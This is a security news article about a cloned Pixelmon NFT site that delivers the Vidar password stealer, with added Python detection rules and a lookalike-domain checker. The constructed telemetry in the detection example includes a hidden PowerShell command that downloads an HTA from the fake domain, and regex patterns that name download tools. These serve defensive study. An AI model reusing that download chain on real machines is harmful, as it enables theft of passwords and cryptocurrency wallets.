A counterfeit Pixelmon NFT site lures visitors with free tokens and collectibles while infecting them with malware that steals from their cryptocurrency wallets. Pixelmon is a well-known NFT project that plans to build an online metaverse game in which players can collect, train, and battle other players with Pixelmon pets. The project has drawn considerable attention, with almost 200,000 Twitter followers and more than 25,000 Discord users.
To exploit this interest, threat actors have cloned the original pixelmon.club website and built a fake version at pixelmon[.]pw that delivers malware. Instead of providing a preview of the project’s game, the malicious site serves executables that install password-stealing malware on the visitor’s device.
The website offers a package named Installer.zip containing a broken executable that does not infect visitors with malware. However, MalwareHunterTeam, who first identified the malicious site, found other malicious files served from it, which let us see what malware it was spreading.
Setup.zip, which contains the setup.lnk file, is another file distributed by the fake website. Setup.lnk is a Windows shortcut that runs a PowerShell command to download a system32.hta file from pixelmon[.]pw. When examined, the system32.hta file was found to download Vidar, a password-stealing malware that is not as widely used as it once was. Security researcher Fumik0_, who has previously studied this malware family, confirmed the identification.
When run, the threat actor’s Vidar sample connects to a Telegram channel and retrieves the IP address of the malware’s command-and-control (C2) server. The malware then obtains a configuration from the C2 and downloads further modules to steal data from the infected device. Vidar can steal passwords from browsers and applications, and it can also scan a computer for files with specific names, which it then sends to the threat actor.
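The infection chain above (a shortcut that launches PowerShell, which fetches an HTA, which drops a stealer that finds its C2 through Telegram) leaves a recognisable trail in endpoint telemetry. The following is an added example written for this article, not code from the article, from MalwareHunterTeam, or from any vendor: three detection rules run over constructed, Sysmon-style process-creation and network events. The event field names and the dropped file name `update.exe` are assumptions, and the URL is defanged as in the article.

```python
"""Detection logic for the LNK -> PowerShell -> HTA -> infostealer chain.

Added example, not code from the article or from any vendor. The records
below are constructed to resemble Sysmon-style process-creation (ID 1) and
network-connection (ID 3) events; the field names and the file names in them
are assumptions, not a real product's schema or real indicators.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # 1 = process creation, 3 = network connection
    image: str               # full path of the executing binary
    parent_image: str = ""   # process-creation events only
    command_line: str = ""   # process-creation events only
    dest_host: str = ""      # network events only


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Common PowerShell ways of fetching a remote file (a "download cradle").
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|"
    r"start-bitstransfer|net\.webclient)", re.IGNORECASE)
HTA_REF = re.compile(r"\.hta\b", re.IGNORECASE)
URL_ARG = re.compile(r"https?://", re.IGNORECASE)
# Paths an ordinary user (and therefore a dropper) can write to.
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.IGNORECASE)
TELEGRAM_HOSTS = ("t.me", "telegram.org", "telegram.me")
KNOWN_TELEGRAM_CLIENTS = {"telegram.exe"}


def _is_telegram_host(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in TELEGRAM_HOSTS)


def detect(events):
    """Return (rule_name, event) pairs for events matching one of three rules."""
    hits = []
    for ev in events:
        img = _basename(ev.image)
        parent = _basename(ev.parent_image)
        if ev.event_id == 1:
            # Rule 1: a shortcut double-clicked in Explorer spawns PowerShell, which
            # fetches an .hta file. Sysmon does not record the .lnk itself, so the
            # signal is explorer.exe as parent plus a cradle that references .hta.
            if (img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe"
                    and DOWNLOAD_CRADLE.search(ev.command_line)
                    and HTA_REF.search(ev.command_line)):
                hits.append(("lnk_powershell_hta_download", ev))
            # Rule 2: mshta.exe executing an HTA from a URL or a user-writable path.
            elif img == "mshta.exe" and (URL_ARG.search(ev.command_line)
                                         or (HTA_REF.search(ev.command_line)
                                             and USER_WRITABLE.search(ev.command_line))):
                hits.append(("mshta_remote_or_temp_hta", ev))
        elif ev.event_id == 3:
            # Rule 3: Vidar resolves its C2 through a Telegram channel, so a binary
            # running from a user-writable directory (not the Telegram client itself)
            # contacting Telegram is worth a look.
            if (_is_telegram_host(ev.dest_host) and img not in KNOWN_TELEGRAM_CLIENTS
                    and USER_WRITABLE.search(ev.image)):
                hits.append(("unexpected_process_to_telegram", ev))
    return hits


# Constructed sample telemetry; the hostname is defanged as in the article.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=('powershell.exe -w hidden -c "iwr hxxp://pixelmon[.]pw/system32.hta '
                        '-OutFile $env:TEMP\\system32.hta"')),
    Event(1, r"C:\Windows\System32\mshta.exe",
          parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          command_line=r"mshta.exe C:\Users\alice\AppData\Local\Temp\system32.hta"),
    Event(3, r"C:\Users\alice\AppData\Local\Temp\update.exe",  # hypothetical dropped stealer
          dest_host="t.me"),
    Event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line='powershell.exe -c "Get-ChildItem C:\\Reports"'),  # benign admin use
    Event(3, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest_host="t.me"),                                          # browser visiting Telegram
]


if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule}: {ev.image} {ev.command_line or ev.dest_host}")
```

Rule 1 is the highest-value one: Explorer spawning a hidden PowerShell that downloads an `.hta` almost never happens legitimately, whereas rule 3 on its own is only a lead, since many benign programs talk to Telegram. In a real deployment the three hits would be correlated by host and time window rather than reported separately.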
As the malware configuration shows, the C2 instructs the malware to search for and steal numerous types of files, including text files, password files, cryptocurrency wallets, codes, backups, and authentication files. Since this is an NFT site, visitors are likely to have cryptocurrency wallets installed on their PCs, so the threat actors focus on finding and stealing cryptocurrency-related material.
While the website is not currently serving a functioning payload, the threat actors have clearly been modifying it recently: payloads that were available two days ago are no longer being served. Based on this activity, we should expect the campaign to remain active and working payloads to be added shortly.
Given the large number of scams aimed at stealing cryptocurrency from NFT project users, always double-check that the URL you are visiting belongs to the project you are interested in. Furthermore, before running any executable from an unfamiliar website, scan it with antivirus software or check it against VirusTotal.
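Both pieces of advice can be made mechanical. The block below is an added example, not code from the article or from the Pixelmon project: it classifies a link against an allowlist of official domains (catching the same-name-different-TLD trick used by pixelmon[.]pw, brand names buried in someone else's subdomain, and one-character typosquats), and it hashes a downloaded file so the hash can be searched on VirusTotal without uploading the file. `OFFICIAL_DOMAINS` is a constructed allowlist, and the hosts other than the two named in the article are hypothetical.

```python
"""Two checks a visitor can run before trusting an NFT project link or file.

Added example, not code from the article. OFFICIAL_DOMAINS is a constructed
allowlist (take the real value from the project's verified channels); the
lookalike hosts in __main__ are the article's fake domain plus hypothetical ones.
"""
import hashlib
from urllib.parse import urlsplit

OFFICIAL_DOMAINS = {"pixelmon.club"}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Good enough for .club/.pw; a public-suffix
    list is needed for multi-label suffixes such as .co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str) -> str:
    """Classify a link relative to the official domains.

    Returns "official", "lookalike_tld" (same name, different TLD, like the
    fake pixelmon[.]pw), "lookalike_subdomain" (brand used as a subdomain of
    someone else's domain), "lookalike_typo", or "unrelated".
    """
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    domain = registrable_domain(host)
    if domain in OFFICIAL_DOMAINS:
        return "official"
    name = domain.rsplit(".", 1)[0]
    for official in OFFICIAL_DOMAINS:
        brand = official.rsplit(".", 1)[0]
        if name == brand:
            return "lookalike_tld"
        if brand in host:
            return "lookalike_subdomain"
        if levenshtein(name, brand) <= 1:
            return "lookalike_typo"
    return "unrelated"


def sha256_hex(data: bytes) -> str:
    """Hash of a downloaded file; search the hash on VirusTotal rather than
    uploading the file, so nothing private leaves the machine."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    for link in ("https://www.pixelmon.club/play", "pixelmon.pw",
                 "https://pixelmon.club.example.net/", "https://pixelmom.club"):
        print(f"{link:40} -> {classify(link)}")
```

Searching a hash on VirusTotal is enough for a file that others have already submitted; an unknown hash means the file is either brand new or unique to you, which for a "game preview" from an unfamiliar site is itself a reason not to run it.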